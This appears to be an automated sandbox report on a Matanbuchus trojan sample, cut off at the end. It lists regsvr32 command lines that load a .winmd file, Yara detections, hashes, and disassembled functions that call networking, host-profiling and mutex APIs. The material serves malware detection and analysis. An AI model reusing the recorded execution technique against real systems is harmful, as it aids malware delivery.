Description: unknown, Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	16:11:08
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0x7ff61ef80000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:11:08
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0xcb0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:12:06
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0x7ff61ef80000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:12:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0xcb0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:13:06
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0x7ff61ef80000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:13:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0xcb0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:14:06
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0x7ff61ef80000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:14:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0xcb0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:15:06
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0x7ff61ef80000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	16:15:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Imagebase:	0xcb0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	95.9%
Signature Coverage:	28.4%
Total number of Nodes:	778
Total number of Limit Nodes:	76

Executed Functions

Function 7EE33740 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1205COMMON

Download Yara Rule

Strings

2, xrefs: 7EE33941
c, xrefs: 7EE337B6
Operation, xrefs: 7EE347E5
\, xrefs: 7EE33802
advapi32, xrefs: 7EE3483C
MNo name attribute , xrefs: 7EE337BE, 7EE34AFC
Q, xrefs: 7EE33756

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
API String ID: 0-301690894
Opcode ID: 6b8c6f1e0560b586cb4579fbd03722bbf7507d5c397e10d6358b745f6671c67b
Instruction ID: db02479bcd3cca7a8e07d2f456a2e9f6a4334b96948645ca1239159c0edbe657
Opcode Fuzzy Hash: 6b8c6f1e0560b586cb4579fbd03722bbf7507d5c397e10d6358b745f6671c67b
Instruction Fuzzy Hash: 5EE222B8D052698FDB25CF5AC890BEDBBB2BF48304F2085DAD849AB355D7305A81CF44

Function 7EE54390 Relevance: 16.8, APIs: 6, Strings: 2, Instructions: 2845networkCOMMON

Download Yara Rule

APIs

Part of subcall function 7EE03DB0: std::ios_base::clear.LIBCPMTD ref: 7EE0421A

socket.WS2_32(?,?,?), ref: 7EE552C3
gethostbyname.WS2_32(?), ref: 7EE5565F
connect.WS2_32(?,?,?), ref: 7EE56255
send.WS2_32(?,?,?,?), ref: 7EE56649
recv.WS2_32(?,?,?,?), ref: 7EE56AA2
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EE5799B

Strings

t~, xrefs: 7EE56788, 7EE56794
-P, xrefs: 7EE569D3

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
String ID: -P$t~
API String ID: 3660264722-703628869
Opcode ID: bf914702eed0200647fb74266839e07b8ede23d2328e3e1b4ee40d5429c18c6d
Instruction ID: d533027b317c587c86eb7023e02dd061673be1e2285f683c907235f18a985958
Opcode Fuzzy Hash: bf914702eed0200647fb74266839e07b8ede23d2328e3e1b4ee40d5429c18c6d
Instruction Fuzzy Hash: 0073ADB8E052698FCB65CF18C990B9DBBB1BF88304F1085DAD849A7355DB31AE85CF50

Function 7EE29AB9 Relevance: 14.0, APIs: 3, Strings: 3, Instructions: 3504COMMON

Download Yara Rule

Strings

PATH, xrefs: 7EE2A367
MNo name attribute , xrefs: 7EE29D3A
~, xrefs: 7EE2C0FC

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: MNo name attribute $PATH$~
API String ID: 0-1445442829
Opcode ID: bc89ba96c56678421b7db2be89d835751fbc629bff60e08801e05445b89d12c9
Instruction ID: 84125902aa646c0b2d62416ce7a4452e8236cf596b9c88e5c0f6ee57d7014485
Opcode Fuzzy Hash: bc89ba96c56678421b7db2be89d835751fbc629bff60e08801e05445b89d12c9
Instruction Fuzzy Hash: 98737BB5D152598BCF20EB78CD45BDDBBB9AB89204F5089DDD04DA7281EB301B84CF92

Function 7EE29B5B Relevance: 10.9, APIs: 3, Strings: 2, Instructions: 2180COMMON

Download Yara Rule

Strings

PATH, xrefs: 7EE2A367
y, xrefs: 7EE2BFE4

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: PATH$y
API String ID: 0-973648926
Opcode ID: 5158889ab8609988eb7d7245bd43be1692ea67bb3137e4bc6158fd4570102bad
Instruction ID: 452c07a553e4ceac5c220963e7ef299f20dd3c0ba40af9baac13f27f7a4c4779
Opcode Fuzzy Hash: 5158889ab8609988eb7d7245bd43be1692ea67bb3137e4bc6158fd4570102bad
Instruction Fuzzy Hash: 3F239DB5D152588BCF14EF68CD41BDDBBB8AF89204F5089DDE04AA7241EB305B84CF92

Function 7EE29B3B Relevance: 10.9, APIs: 3, Strings: 2, Instructions: 2180COMMON

Download Yara Rule

Strings

PATH, xrefs: 7EE2A367
y, xrefs: 7EE2BFE4

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: PATH$y
API String ID: 0-973648926
Opcode ID: ab3372aaa76b3375fe5ad809373ed20da47f6c370251359a1af2e813efe27463
Instruction ID: be4b86d0f4dda3d5a7a620a29734a20be6ededb4837fa5d8db80bc505982938d
Opcode Fuzzy Hash: ab3372aaa76b3375fe5ad809373ed20da47f6c370251359a1af2e813efe27463
Instruction Fuzzy Hash: 4C239DB5D152588BCF14EF68CD45BDDBBB8AF89204F5089DDE04AA7241EB305B84CF92

Function 7EE29B17 Relevance: 10.9, APIs: 3, Strings: 2, Instructions: 2178COMMON

Download Yara Rule

Strings

PATH, xrefs: 7EE2A367
y, xrefs: 7EE2BFE4

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: PATH$y
API String ID: 0-973648926
Opcode ID: 64a68bd091395f89071382d4c6c8002991d4621300b385b3fd4a9f86f8faacf8
Instruction ID: 9642bfb8a8157ef1b0c83cc89f375b0cc3285300c2786ddeea7757829d461445
Opcode Fuzzy Hash: 64a68bd091395f89071382d4c6c8002991d4621300b385b3fd4a9f86f8faacf8
Instruction Fuzzy Hash: CA239DB5D152588BCF14EF68CD45BDDBBB8AF89204F5089DDE04AA7241EB305B84CF92

Function 7EE29F6C Relevance: 10.8, APIs: 3, Strings: 2, Instructions: 2046
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?,?), ref: 7EE2A0C7
GetEnvironmentVariableW.KERNEL32(PATH,00000000,00000000), ref: 7EE2A36C

Strings

PATH, xrefs: 7EE2A367
y, xrefs: 7EE2BFE4

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: EnvironmentPathTempVariable
String ID: PATH$y
API String ID: 3416030377-973648926
Opcode ID: 7855319370ba3e11576de60a03bf8b96d470965231b79eedcea12b6fffb3afb7
Instruction ID: 39b85e065d3827d18b9199f1ada78808c0473923df0868459a8b171fc025477c
Opcode Fuzzy Hash: 7855319370ba3e11576de60a03bf8b96d470965231b79eedcea12b6fffb3afb7
Instruction Fuzzy Hash: 3C139DB5D152588BCF14EB78CD45BDDBBB8AF89204F5089DDE04AA7241EB305B84CF92

Function 7EE4E1C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 7EE4E361
__aulldiv.LIBCMT ref: 7EE4E379
__aulldiv.LIBCMT ref: 7EE4E387

Strings

\ ~, xrefs: 7EE4E2D1
@, xrefs: 7EE4E1CC

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: @$\ ~
API String ID: 2185283323-1795719950
Opcode ID: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
Instruction ID: e89d2e74b2aefcb9d093c5d2af2f61239b42db52aaebdafb1ffbce1ab20bf622
Opcode Fuzzy Hash: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
Instruction Fuzzy Hash: 4771AFB8E04259DFCB04CF98D590AAEFBB1BF49304F20819AE915AB355D734AA41CF94

Function 7EE49D20 Relevance: 8.0, Strings: 6, Instructions: 533
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 7EE49E59
r, xrefs: 7EE4A40E
t, xrefs: 7EE49F77
5, xrefs: 7EE4A1EB
\ ~, xrefs: 7EE49EA0, 7EE49EAF, 7EE49ECF
N/A, xrefs: 7EE49D42, 7EE49D95, 7EE4A0C3, 7EE4A116, 7EE4A169, 7EE4A1BC

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5$G$N/A$\ ~$r$t
API String ID: 0-1815696270
Opcode ID: e1c034e3643d4861483f682dc6a9abf64b58a8a8492fce0a3bf67e04dcf574fe
Instruction ID: c8738ef32e030eda0ef669105751fb13be775714452f46a7968958952b052ccc
Opcode Fuzzy Hash: e1c034e3643d4861483f682dc6a9abf64b58a8a8492fce0a3bf67e04dcf574fe
Instruction Fuzzy Hash: 3E422374E042598BDB14CFA8C880BEEB7B2FF89300F1085A9E50DAB354EB755A85CF55

Function 7EE4F830 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 635
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7EE4FA5A
CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7EE50140

Strings

}, xrefs: 7EE4FFE1
w, xrefs: 7EE4F90D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: BlanketInitializeProxySecurity
String ID: w$}
API String ID: 257369873-1906527200
Opcode ID: 99f103eb57c5277aa63315cb7edac2c6fe2a9236f69c0248196aac8887cbb9af
Instruction ID: e7da31b08e34e56658059f1e3d48c30c3c842644449883a513543b72f5d578c8
Opcode Fuzzy Hash: 99f103eb57c5277aa63315cb7edac2c6fe2a9236f69c0248196aac8887cbb9af
Instruction Fuzzy Hash: 7D621434A14259CBDB24CFA4C850BEEB7B2FF99300F1094A9D50DAB3A0E7755A85CF46

Function 7EE495F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 7EE4986F
GetDriveTypeA.KERNEL32(7EE881EC), ref: 7EE49903

Strings

*, xrefs: 7EE49846

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: DriveHeapProcessType
String ID: *
API String ID: 2912393814-163128923
Opcode ID: 1f1a8e1cc92c8c184a2cda52e8e5dbf015ff1ecb8dcb367c8ca7374df7bddc70
Instruction ID: 20615da18dd8c6fdccdf91dead375853d650482247f6e7e21988d123be097369
Opcode Fuzzy Hash: 1f1a8e1cc92c8c184a2cda52e8e5dbf015ff1ecb8dcb367c8ca7374df7bddc70
Instruction Fuzzy Hash: 84A12AB9D08299CFDB14CFAAC44079DBBF6BB49300F20899AD449BB365D7300A44CF5A

Function 7EE4B260 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 863
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI(?,?), ref: 7EE4B4B7

Strings

\ ~, xrefs: 7EE4B375, 7EE4B37E, 7EE4B3A0, 7EE4B435

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: AdaptersInfo
String ID: \ ~
API String ID: 3177971545-2911314598
Opcode ID: 19006e45f5e80cff1f306a3d883b4140c95643db227edd272f3f247e34614e80
Instruction ID: 3db27f93fc66177d5b975f348cabaa35d614e4ac4fdc1fc7edd94081d300b938
Opcode Fuzzy Hash: 19006e45f5e80cff1f306a3d883b4140c95643db227edd272f3f247e34614e80
Instruction Fuzzy Hash: 4CA2AF78E052698FCB68CF58C894BDDBBB1BF89304F1085DAD849A7355DB30AA85CF50

Function 7EE4E690 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNEL32(?,?,?), ref: 7EE4E863

Strings

WORKGROUP, xrefs: 7EE4E86A, 7EE4E8BD, 7EE4E8EF, 7EE4E942

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: WORKGROUP
API String ID: 3545744682-2380569353
Opcode ID: e7889443499aec7d1dbb319f31cc443e6ebd5c76646a28fdf10cbecd3e5a06c3
Instruction ID: de8028a3b18d2f640e0b597005a6b53cf50b66171045408ef9ea5cffcea1e06e
Opcode Fuzzy Hash: e7889443499aec7d1dbb319f31cc443e6ebd5c76646a28fdf10cbecd3e5a06c3
Instruction Fuzzy Hash: 25B1D078E05259DFDB14CF98C890BADFBB2BF49304F248599E819AB345D730AA85CF50

Function 7EE4ADB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 7EE4AF47

Strings

\ ~, xrefs: 7EE4AEB7

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID: \ ~
API String ID: 31276548-2911314598
Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
Instruction ID: e794389f3a8dc8439fd24691b5cd27b7422bc7d87f53cbe5918e0e83936ef84b
Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
Instruction Fuzzy Hash: 6861B0B8E04219DFCB04CF99D590AEDFBB1BF49314F20819AE819AB345D730AA41CF50

Function 7EE50C00 Relevance: 2.8, Strings: 1, Instructions: 1512
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 7EE52534

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID: L
API String ID: 2807920213-2909332022
Opcode ID: 3a850b67a2f5cb23107b31a1e3c8a39cb4036778cdd8f7273efbb80d24de5755
Instruction ID: 487745d64ae8ecefcd2498cbe6a9ffce55bf5225a64c86ab2b5b0b4290dc6d1f
Opcode Fuzzy Hash: 3a850b67a2f5cb23107b31a1e3c8a39cb4036778cdd8f7273efbb80d24de5755
Instruction Fuzzy Hash: C5034474D052689FCB25CB68CD94BDEBBB5AF49304F5089D9D409A7281DB702F88CF91

Function 6C55D860 Relevance: 2.6, APIs: 1, Instructions: 1057
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000003,00000000,00000000,00000000), ref: 6C55D93E

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 7edaa10bcc2a8f0dd4fb9d2b435bb4ca412513995991a77b7a25204361259629
Instruction ID: 2968d2a6e9eda9192d78ad8f81ad5cdaba3fe7a1b90c9a39d855156e7a270fb7
Opcode Fuzzy Hash: 7edaa10bcc2a8f0dd4fb9d2b435bb4ca412513995991a77b7a25204361259629
Instruction Fuzzy Hash: 90927FB1A00218DFDB04DFE4DD41BEEB7B1AF88304F1081AAE509AB791E7749E95CB51

Function 7EE34392 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathIsDirectoryW.SHLWAPI(?), ref: 7EE345AB

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectoryPath
String ID:
API String ID: 1580926078-0
Opcode ID: ddfeb5ba4bb4a8b347040e1200cd34f34b43f501bb2f47611d69123f96fca33f
Instruction ID: aead2a63ecc628c277d289275f7bd941b2c4d34873cf67d5b9adaafa60adf3e4
Opcode Fuzzy Hash: ddfeb5ba4bb4a8b347040e1200cd34f34b43f501bb2f47611d69123f96fca33f
Instruction Fuzzy Hash: 94B1D1B8D05269CBDB25CF59C894BADBBB2BF48304F2086DAD819A7355D7309E81CF44

Function 7EE5DDF9 Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID:
API String ID: 3758378126-0
Opcode ID: 3fff5e99767f6e6573531644ea2174752e791c7f8b42153f1513675568aaf5c2
Instruction ID: 57a7e60540820a935975f8ab019537097863e2fc6f809fe5eb4428333b20f5d7
Opcode Fuzzy Hash: 3fff5e99767f6e6573531644ea2174752e791c7f8b42153f1513675568aaf5c2
Instruction Fuzzy Hash: F991E478E05268CFDB64CF69C890B99B7B5BF88304F2085DAD80DA7356D731AA81CF44

Function 7EE277A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7EE27A47
GetLastError.KERNEL32 ref: 7EE27B44
CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7EE27CBA

Strings

{, xrefs: 7EE27834
u, xrefs: 7EE278D3
9mD, xrefs: 7EE278A9
B, xrefs: 7EE27AED
*, xrefs: 7EE27A5A

Memory Dump Source

